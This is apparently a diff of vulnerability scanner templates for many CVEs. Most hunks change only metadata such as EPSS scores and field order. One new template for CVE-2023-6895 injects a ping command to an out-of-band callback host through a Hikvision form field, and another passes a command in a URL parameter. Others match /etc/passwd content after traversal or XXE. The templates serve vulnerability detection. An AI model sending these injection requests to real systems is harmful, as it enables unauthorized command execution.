# digest: 490a004630440220206394b303ab92ce65590e2c61e6eb5e9914219a5a0651ae69009a3f224109ff02207e729d1c062d3bd2e445a39a036992cc281564407a764e7f7ced5f02879f1034:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100924b4c785059886c8131bde539e1106c1be30952a7fea88bd992cb9cc3e7aca202204c4c3c880b323df6c23378c766e00dd0222716aa49f384cbc8f4c37b7c9ab38f:922c64590222798bb761d5b6d8e72950
|
|
@ -21,7 +21,7 @@ info:
|
|||
cve-id: CVE-2022-0776
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.001
|
||||
epss-percentile: 0.40832
|
||||
epss-percentile: 0.40075
|
||||
cpe: cpe:2.3:a:revealjs:reveal.js:*:*:*:*:*:node.js:*:*
|
||||
metadata:
|
||||
vendor: revealjs
|
||||
|
@ -48,4 +48,4 @@ headless:
|
|||
part: extract
|
||||
words:
|
||||
- "true"
|
||||
# digest: 4a0a00473045022015776ab1f8ee5f7cbd078059bc34167a0b8ca0a11a1bda34723f7ec03d31b6c302210098d1c6a54ecbafb3158390aea2498590fe70df9d78d3266d388274859a641533:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100822f5151d594a59ff99bde533919eb403ddd05ab8d041ea5963a1c88f81d84320221008c8e17c078665f80ff1f6815e2f071996a8d9e4712b43e3bf775f0c2db3e0e12:922c64590222798bb761d5b6d8e72950
|
|
@ -22,7 +22,7 @@ info:
|
|||
cve-id: CVE-2022-26263
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00147
|
||||
epss-percentile: 0.50638
|
||||
epss-percentile: 0.49633
|
||||
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -43,4 +43,4 @@ headless:
|
|||
- '<frame src="javascript:console.log(document.domain)"'
|
||||
- 'webhelp4.js'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100a72f95b8648b73eb2e4cf2ea58e09902bdd87b68ed16d6258763f77029657162022064b391ae3ee631c189007bc15526ede89c3be32159ec215d129a1840544b297e:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100c124eb614790888649b3ad794123f8a4d5127efb6b3dfcccc25a1431ae2dd660022100bdd24ef15743a8543fc37ed7a7e4a0399762873c6016d5cd6a811baa514a747d:922c64590222798bb761d5b6d8e72950
|
|
@ -22,7 +22,7 @@ info:
|
|||
cve-id: CVE-2022-30776
|
||||
cwe-id: CWE-79
|
||||
epss-score: 0.00112
|
||||
epss-percentile: 0.44504
|
||||
epss-percentile: 0.43631
|
||||
cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -52,4 +52,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502203171cb9a5a9125732f06bba74b71efc2e09ae7c92ad33bcca6e6356b5d541fe702210081422e4791a4a926b08807deffab9bf4cb8eab98c0f9897922d586b01218bf06:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502210098e7e92637618d4c3c5540938565842f9d2479c1b7a7ca9a9333b2e0bf64a29b022077e0d1d54bd671842a9ba69fdbad1ed67e8c6f085c3235fde69b2d9e18009833:922c64590222798bb761d5b6d8e72950
|
|
@ -37,7 +37,7 @@ variables:
|
|||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/doAs?=`{{url_encode("{{command}}")}}`'
|
||||
- '{{BaseURL}}/?doAs=`{{url_encode("{{command}}")}}`'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -45,4 +45,4 @@ http:
|
|||
part: body
|
||||
words:
|
||||
- "19833-2202-EVC"
|
||||
# digest: 4a0a004730450221008bb8dca83860e99f6649206e34e12203a4ef600bbafcd7ae6b135b537faab9990220205c3ed10d667efd9a2e7f2128c855334fab697f0bf55bf5792362c774f88c91:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950
|
|
@ -6,28 +6,29 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.
|
||||
impact: |
|
||||
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
|
||||
remediation: |
|
||||
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
|
||||
reference:
|
||||
- https://tenable.com/security/research/tra-2022-30
|
||||
- https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect
|
||||
- https://github.com/JoshuaMart/JoshuaMart
|
||||
impact: |
|
||||
An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
|
||||
remediation: |
|
||||
This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-38131
|
||||
cwe-id: CWE-601
|
||||
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
|
||||
epss-score: 0.0006
|
||||
epss-percentile: 0.23591
|
||||
cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
product: connect
|
||||
shodan-query: "http.favicon.hash:217119619"
|
||||
fofa-query: "app=\"RStudio-Connect\""
|
||||
max-request: 1
|
||||
verified: true
|
||||
vendor: rstudio
|
||||
product: connect
|
||||
shodan-query: http.favicon.hash:217119619
|
||||
fofa-query: app="RStudio-Connect"
|
||||
tags: tenable,cve,cve2022,redirect,rstudio
|
||||
|
||||
http:
|
||||
|
@ -46,4 +47,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 307
|
||||
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950
|
|
@ -18,8 +18,8 @@ info:
|
|||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-4140
|
||||
cwe-id: CWE-552
|
||||
epss-score: 0.01317
|
||||
epss-percentile: 0.84504
|
||||
epss-score: 0.00932
|
||||
epss-percentile: 0.82572
|
||||
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -54,4 +54,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2023-0552
|
||||
cwe-id: CWE-601
|
||||
epss-score: 0.00086
|
||||
epss-percentile: 0.35637
|
||||
epss-percentile: 0.34914
|
||||
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
|
@ -38,4 +38,4 @@ http:
|
|||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
|
||||
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950
|
|
@ -22,7 +22,7 @@ info:
|
|||
cve-id: CVE-2023-26255
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.15138
|
||||
epss-percentile: 0.95348
|
||||
epss-percentile: 0.95663
|
||||
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -52,4 +52,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950
|
|
@ -6,28 +6,29 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
||||
remediation: |
|
||||
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2023-2
|
||||
- https://wordpress.org/plugins/gift-voucher/
|
||||
- https://github.com/ARPSyndicate/cvemon
|
||||
- https://github.com/JoshuaMart/JoshuaMart
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
||||
remediation: |
|
||||
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-28662
|
||||
cwe-id: CWE-89
|
||||
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
|
||||
epss-score: 0.00076
|
||||
epss-percentile: 0.31593
|
||||
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
|
||||
metadata:
|
||||
vendor: codemenschen
|
||||
product: gift_vouchers
|
||||
product: "gift_vouchers"
|
||||
framework: wordpress
|
||||
fofa-query: body="/wp-content/plugins/gift-voucher/"
|
||||
fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
|
||||
max-request: 2
|
||||
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
@ -59,4 +60,4 @@ http:
|
|||
- status_code == 500
|
||||
- contains(body, 'critical error')
|
||||
condition: and
|
||||
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950
|
|
@ -13,13 +13,14 @@ info:
|
|||
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
|
||||
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
|
||||
- https://github.com/mayur-esh/vuln-liners
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-32563
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.43261
|
||||
epss-percentile: 0.97013
|
||||
epss-score: 0.42647
|
||||
epss-percentile: 0.97218
|
||||
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
@ -56,4 +57,4 @@ http:
|
|||
part: body_2
|
||||
words:
|
||||
- "CVE-2023-32563"
|
||||
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: high
|
||||
description: |
|
||||
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
|
||||
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
|
||||
reference:
|
||||
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
|
||||
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
|
||||
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
max-request: 2
|
||||
fofa-query: "OpenCms-9.5.3"
|
||||
verified: true
|
||||
tags: cve,cve2023,xxe,opencms
|
||||
|
||||
http:
|
||||
|
@ -36,4 +36,4 @@ http:
|
|||
- "root:.*:0:0:"
|
||||
- "invalidArgument"
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100927a1bd7a3c4f8af7b6989155be518f1259a6cdd15ba59dad7785280d7c5ec9702203e99452c03ab5e09e1ef1627473fb5a1ebe79a654ad369b1e2190145c98e9b32:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950
|
|
@ -16,8 +16,9 @@ info:
|
|||
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: ivanti
|
||||
product: connect_secure
|
||||
shodan-query: html:"welcome.cgi?p=logo"
|
||||
product: "connect_secure"
|
||||
shodan-query: "html:\"welcome.cgi?p=logo\""
|
||||
max-request: 2
|
||||
tags: cve,cve2023,kev,auth-bypass,ivanti
|
||||
|
||||
http:
|
||||
|
@ -48,4 +49,4 @@ http:
|
|||
- 'contains(body_2, "block_message")'
|
||||
- 'contains(header_2, "application/json")'
|
||||
condition: and
|
||||
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950
|
|
@ -14,14 +14,15 @@ info:
|
|||
cvss-score: 5.4
|
||||
cve-id: CVE-2023-52085
|
||||
cwe-id: CWE-22
|
||||
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.12483
|
||||
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: wintercms
|
||||
product: winter
|
||||
shodan-query: title:"Winter CMS"
|
||||
fofa-query: title="Winter CMS"
|
||||
shodan-query: "title:\"Winter CMS\""
|
||||
fofa-query: "title=\"Winter CMS\""
|
||||
max-request: 4
|
||||
tags: cve,cve2023,authenticated,lfi,wintercms
|
||||
|
||||
http:
|
||||
|
@ -68,4 +69,4 @@ http:
|
|||
regex:
|
||||
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
|
||||
internal: true
|
||||
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950
|
|
@ -6,25 +6,26 @@ info:
|
|||
severity: high
|
||||
description: |
|
||||
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
|
||||
remediation: |
|
||||
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6831
|
||||
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
|
||||
- https://huntr.com/bounties/0acdd745-0167-4912-9d5c-02035fe5b314
|
||||
remediation: |
|
||||
Upgrade Mlflow to version 2.9.2 or later to mitigate the vulnerability.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
|
||||
cvss-score: 8.1
|
||||
cve-id: CVE-2023-6831
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.000460000
|
||||
epss-percentile: 0.126930000
|
||||
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
|
||||
epss-score: 0.00046
|
||||
epss-percentile: 0.12693
|
||||
metadata:
|
||||
verified: true
|
||||
vendor: lfprojects
|
||||
product: mlflow
|
||||
shodan-query: http.title:"mlflow"
|
||||
shodan-query: "http.title:\"mlflow\""
|
||||
max-request: 2
|
||||
verified: true
|
||||
tags: cve,cve2023,mlflow,pathtraversal,lfprojects
|
||||
|
||||
http:
|
||||
|
@ -58,4 +59,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 500
|
||||
# digest: 490a0046304402202e05b1ca433f0cc3ad8178fa3db634d613c180a5d76bd1907daf5a29b102f02f0220546c974febbb5121e3697cfc1e76620c450e31cee055c94cd0b25375648e38ba:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022032f829866528954cdb8ce1c5298787430b08b1d4550ab556b77f078e362da3e102207691a8b5b4639a9faf128176e590b98fc0841775bb6df00b97a7253772fe498a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,56 @@
|
|||
id: CVE-2023-6895
|
||||
|
||||
info:
|
||||
name: Hikvision Intercom Broadcasting System - Command Execution
|
||||
author: archer
|
||||
severity: critical
|
||||
description: |
|
||||
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
|
||||
reference:
|
||||
- https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
|
||||
- https://vuldb.com/?ctiid.248254
|
||||
- https://vuldb.com/?id.248254
|
||||
- https://github.com/Marco-zcl/POC
|
||||
- https://github.com/d4n-sec/d4n-sec.github.io
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2023-6895
|
||||
cwe-id: CWE-78
|
||||
epss-score: 0.0008
|
||||
epss-percentile: 0.32716
|
||||
cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: hikvision
|
||||
product: intercom_broadcast_system
|
||||
fofa-query: icon_hash="-1830859634"
|
||||
tags: cve,cve2023,rce,hikvision
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /php/ping.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "TTL="
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950
|
|
@ -6,24 +6,25 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.
|
||||
impact: |
|
||||
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
|
||||
remediation: |
|
||||
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
|
||||
reference:
|
||||
- https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-6909
|
||||
- https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
|
||||
impact: |
|
||||
Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
|
||||
remediation: |
|
||||
To fix this vulnerability, it is important to update the mlflow package to the latest version 2.10.0.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
|
||||
cvss-score: 9.3
|
||||
cve-id: CVE-2023-6909
|
||||
cwe-id: CWE-29
|
||||
metadata:
|
||||
max-request: 5
|
||||
verified: true
|
||||
vendor: lfprojects
|
||||
product: mlflow
|
||||
shodan-query: http.title:"mlflow"
|
||||
shodan-query: "http.title:\"mlflow\""
|
||||
tags: cve,cve2023,mlflow,lfi
|
||||
|
||||
http:
|
||||
|
@ -90,4 +91,4 @@ http:
|
|||
json:
|
||||
- '.run.info.run_id'
|
||||
internal: true
|
||||
# digest: 4a0a00473045022057cab29fe3d00006c6db44ac420a34cecdad60ef71ae6159d9d1870d61d97420022100cd6d7114a977b54c1190e1a9a7002626d05b41874dccf1e9e5d38cacc7082c6d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100dc4c33652fcf1a1d0dc29690ac81838de82d0c439cc405cb3b0296d4e10cb855022100b3a49f754395ee217ea12cc561be556cc6c3a8da3facee851d5f37fdbab72d61:922c64590222798bb761d5b6d8e72950
|
|
@ -15,14 +15,15 @@ info:
|
|||
cvss-score: 8.8
|
||||
cve-id: CVE-2024-0713
|
||||
cwe-id: CWE-434
|
||||
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
|
||||
epss-score: 0.00061
|
||||
epss-percentile: 0.2356
|
||||
cpe: cpe:2.3:a:monitorr:monitorr:1.7.6m:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
vendor: monitorr
|
||||
product: monitorr
|
||||
verified: true
|
||||
fofa-query: icon_hash="-211006074"
|
||||
fofa-query: "icon_hash=\"-211006074\""
|
||||
max-request: 2
|
||||
tags: cve,cve2024,file-upload,intrusive,monitorr
|
||||
|
||||
variables:
|
||||
|
@ -66,4 +67,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a0047304502200e99cf7ecbba3a0c88653fc454cb5715d7085e0678ab470e4b7cfbf4dd198e8d022100e47a621b93eaabb8881e48cae80b9cc8c0596a437fc9b8ac0921a63beee74506:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402201b9bb4536c3d56e915516c2b0156629ce6f3689a312eddd8d0694b86aa144e1902203d8dccbcbba044b30e6fff72ceb7f66bf40a9bf6f3130c3f3b11b0ec3c30a863:922c64590222798bb761d5b6d8e72950
|
|
@ -6,17 +6,17 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
|
||||
reference:
|
||||
- https://github.com/getrebuild/rebuild
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
||||
remediation: |
|
||||
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
|
||||
reference:
|
||||
- https://github.com/getrebuild/rebuild
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
||||
metadata:
|
||||
max-request: 1
|
||||
max-request: 2
|
||||
verified: true
|
||||
fofa-query: icon_hash="871154672"
|
||||
fofa-query: "icon_hash=\"871154672\""
|
||||
tags: cve2024,cve,rebuild,ssrf
|
||||
|
||||
http:
|
||||
|
@ -32,4 +32,4 @@ http:
|
|||
- '!contains(body_1, "<h1> Interactsh Server </h1>")'
|
||||
- 'status_code_2 == 200'
|
||||
condition: and
|
||||
# digest: 4a0a004730450220098225bea96b8668687e7dfe13e7567202130b05bf6e23cffcc70cb83386d700022100f078d24ac95ac54515557e84e1bc60404c9d6d59cfa0604f82e5d03baaf841e6:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220491492872c6924a820f6183de45c341dbc8838eec5bd79f241a7a8e007817a4d022100bcf486a787a7ac18c43f5a856e8edf8c68546b59012e7c096bbc48085b3ce175:922c64590222798bb761d5b6d8e72950
|
|
@ -6,14 +6,14 @@ info:
|
|||
severity: high
|
||||
description: |
|
||||
WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
||||
remediation: |
|
||||
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-02
|
||||
- https://wordpress.org/plugins/html5-video-player
|
||||
- https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-1061
|
||||
impact: |
|
||||
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
||||
remediation: |
|
||||
Vendor did not acknowledge vulnerability but the issue seems to have been fixed in version 2.5.25.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
|
@ -21,7 +21,8 @@ info:
|
|||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: '"wordpress" && body="html5-video-player"'
|
||||
fofa-query: "\"wordpress\" && body=\"html5-video-player\""
|
||||
max-request: 1
|
||||
tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player
|
||||
|
||||
http:
|
||||
|
@ -36,4 +37,4 @@ http:
|
|||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "created_at", "video_id")'
|
||||
condition: and
|
||||
# digest: 4b0a0048304602210082f5c18e0ac8422e532f5581f775dfd9a57d7c059cf6f41622d7a00306bfa3c6022100d0500ab738261efc3de306be7f8149c4a2f98b4c1560c26fe3617520ce9dd6e9:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100fa33c5d3e6fdd93832d18b7feaeceaab7dc13294ca6117b62c0cf322a734e7d3022100bec7347a690ebaf2785ae5b325485392dbdb16005fd15b862aca9a8930646034:922c64590222798bb761d5b6d8e72950
|
|
@ -6,25 +6,26 @@ info:
|
|||
severity: medium
|
||||
description: |
|
||||
A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
|
||||
impact: |
|
||||
Forged or otherwise, corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
|
||||
reference:
|
||||
- https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
|
||||
